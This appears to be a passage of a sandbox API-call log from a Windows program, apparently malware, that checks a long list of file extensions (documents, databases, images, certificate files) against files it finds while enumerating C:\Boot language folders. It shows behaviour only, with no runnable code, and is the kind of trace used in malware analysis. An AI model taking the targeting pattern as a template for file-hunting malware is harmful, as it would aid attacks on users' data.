[0285.064] lstrlenW (lpString=".log") returned 4 [0285.064] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".m1v") returned 4 [0285.064] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".m4a") returned 4 [0285.064] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".m4v") returned 4 [0285.064] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".max") returned 4 [0285.064] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.064] lstrlenW (lpString=".md") returned 3 [0285.064] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.064] lstrlenW (lpString=".mda") returned 4 [0285.064] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mdb") returned 4 [0285.065] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mde") returned 4 [0285.065] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mdf") returned 4 [0285.065] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mdw") returned 4 [0285.065] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mef") returned 4 [0285.065] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mft") returned 4 [0285.065] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mfw") returned 4 [0285.065] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mht") returned 4 [0285.065] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mhtml") returned 6 [0285.065] lstrcmpiW (lpString1=".mhtml", lpString2="ll.mui") returned -1 [0285.065] lstrlenW (lpString=".mka") returned 4 [0285.065] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mkidx") returned 6 [0285.065] lstrcmpiW (lpString1=".mkidx", lpString2="ll.mui") returned -1 [0285.065] lstrlenW (lpString=".mkv") returned 4 [0285.065] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mos") returned 4 [0285.065] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.065] lstrlenW (lpString=".mov") returned 4 [0285.066] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.066] lstrlenW (lpString=".mp3") returned 4 [0285.066] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0285.066] lstrlenW (lpString=".mp4") returned 4 [0285.066] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.066] lstrlenW (lpString=".mpeg") returned 5 [0285.066] lstrcmpiW (lpString1=".mpeg", lpString2="l.mui") returned -1 [0285.066] lstrlenW (lpString=".mpg") returned 4 [0285.066] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.066] lstrlenW (lpString=".mpv") returned 4 [0285.066] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.066] lstrlenW (lpString=".mrw") returned 4 [0285.066] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.066] lstrlenW (lpString=".msg") returned 4 [0285.066] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.066] lstrlenW (lpString=".mxl") returned 4 [0285.066] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.066] lstrlenW (lpString=".myd") returned 4 [0285.066] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.066] lstrlenW (lpString=".myi") returned 4 [0285.066] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.066] lstrlenW (lpString=".nef") returned 4 [0285.066] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.066] lstrlenW (lpString=".nrw") returned 4 [0285.066] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.066] lstrlenW (lpString=".obj") returned 4 [0285.066] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".odb") returned 4 [0285.067] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".odc") returned 4 [0285.067] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".odm") returned 4 [0285.067] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".odp") returned 4 [0285.067] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".ods") returned 4 [0285.067] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".oft") returned 4 [0285.067] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".one") returned 4 [0285.067] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".onepkg") returned 7 [0285.067] lstrcmpiW (lpString1=".onepkg", lpString2="dll.mui") returned -1 [0285.067] lstrlenW (lpString=".onetoc2") returned 8 [0285.067] lstrcmpiW (lpString1=".onetoc2", lpString2=".dll.mui") returned 1 [0285.067] lstrlenW (lpString=".opt") returned 4 [0285.067] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".oqy") returned 4 [0285.067] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".orf") returned 4 [0285.067] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".p12") returned 4 [0285.067] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.067] lstrlenW (lpString=".p7b") returned 4 [0285.068] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".p7c") returned 4 [0285.068] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pam") returned 4 [0285.068] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pbm") returned 4 [0285.068] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pct") returned 4 [0285.068] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pcx") returned 4 [0285.068] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pdd") returned 4 [0285.068] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pdf") returned 4 [0285.068] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pdp") returned 4 [0285.068] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pef") returned 4 [0285.068] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pem") returned 4 [0285.068] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pff") returned 4 [0285.068] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pfm") returned 4 [0285.068] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pfx") returned 4 [0285.068] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.068] lstrlenW (lpString=".pgm") returned 4 [0285.069] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.069] lstrlenW (lpString=".php") returned 4 [0285.273] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.273] lstrlenW (lpString=".php3") returned 5 [0285.273] lstrcmpiW (lpString1=".php3", lpString2="l.mui") returned -1 [0285.273] lstrlenW (lpString=".php4") returned 5 [0285.273] lstrcmpiW (lpString1=".php4", lpString2="l.mui") returned -1 [0285.273] lstrlenW (lpString=".php5") returned 5 [0285.273] lstrcmpiW (lpString1=".php5", lpString2="l.mui") returned -1 [0285.273] lstrlenW (lpString=".phtml") returned 6 [0285.273] lstrcmpiW (lpString1=".phtml", lpString2="ll.mui") returned -1 [0285.273] lstrlenW (lpString=".pict") returned 5 [0285.273] lstrcmpiW (lpString1=".pict", lpString2="l.mui") returned -1 [0285.273] lstrlenW (lpString=".pl") returned 3 [0285.273] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.273] lstrlenW (lpString=".pls") returned 4 [0285.273] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.273] lstrlenW (lpString=".pm") returned 3 [0285.273] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.273] lstrlenW (lpString=".png") returned 4 [0285.274] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".pnm") returned 4 [0285.274] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".pot") returned 4 [0285.274] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".potm") returned 5 [0285.274] lstrcmpiW (lpString1=".potm", lpString2="l.mui") returned -1 [0285.274] lstrlenW (lpString=".potx") returned 5 [0285.274] lstrcmpiW (lpString1=".potx", lpString2="l.mui") returned -1 [0285.274] lstrlenW (lpString=".ppa") returned 4 [0285.274] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".ppam") returned 5 [0285.274] lstrcmpiW (lpString1=".ppam", lpString2="l.mui") returned -1 [0285.274] lstrlenW (lpString=".ppm") returned 4 [0285.274] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".pps") returned 4 [0285.274] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".ppsm") returned 5 [0285.274] lstrcmpiW (lpString1=".ppsm", lpString2="l.mui") returned -1 [0285.274] lstrlenW (lpString=".ppt") returned 4 [0285.274] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".pptm") returned 5 [0285.274] lstrcmpiW (lpString1=".pptm", lpString2="l.mui") returned -1 [0285.274] lstrlenW (lpString=".pptx") returned 5 [0285.274] lstrcmpiW (lpString1=".pptx", lpString2="l.mui") returned -1 [0285.274] lstrlenW (lpString=".prn") returned 4 [0285.274] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".ps") returned 3 [0285.274] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.274] lstrlenW (lpString=".psb") returned 4 [0285.274] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.274] lstrlenW (lpString=".psd") returned 4 [0285.275] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".pst") returned 4 [0285.275] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".ptx") returned 4 [0285.275] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".pub") returned 4 [0285.275] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".pwm") returned 4 [0285.275] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".pxr") returned 4 [0285.275] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".py") returned 3 [0285.275] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.275] lstrlenW (lpString=".qt") returned 3 [0285.275] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.275] lstrlenW (lpString=".r3d") returned 4 [0285.275] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".raf") returned 4 [0285.275] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".rar") returned 4 [0285.275] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.275] lstrlenW (lpString=".raw") returned 4 [0285.275] lstrcmpiW (lpString1=".raw", lpString2=".mui") returned 1 [0285.275] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 0 [0285.275] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0285.276] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0285.276] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0285.276] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.276] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.276] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0285.276] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.276] FindFirstFileW (in: lpFileName="C:\\Boot\\ro-RO\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.277] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.277] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.277] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.277] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.277] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.277] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0285.278] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.278] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.278] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.279] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.279] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.279] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.279] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.279] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.279] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0285.279] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.279] FindFirstFileW (in: lpFileName="C:\\Boot\\sk-SK\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0285.279] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.279] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.280] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.280] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0285.280] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.280] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0285.280] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.280] FindFirstFileW (in: lpFileName="C:\\Boot\\sl-SI\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.281] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.281] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.281] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.281] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.283] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.283] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, 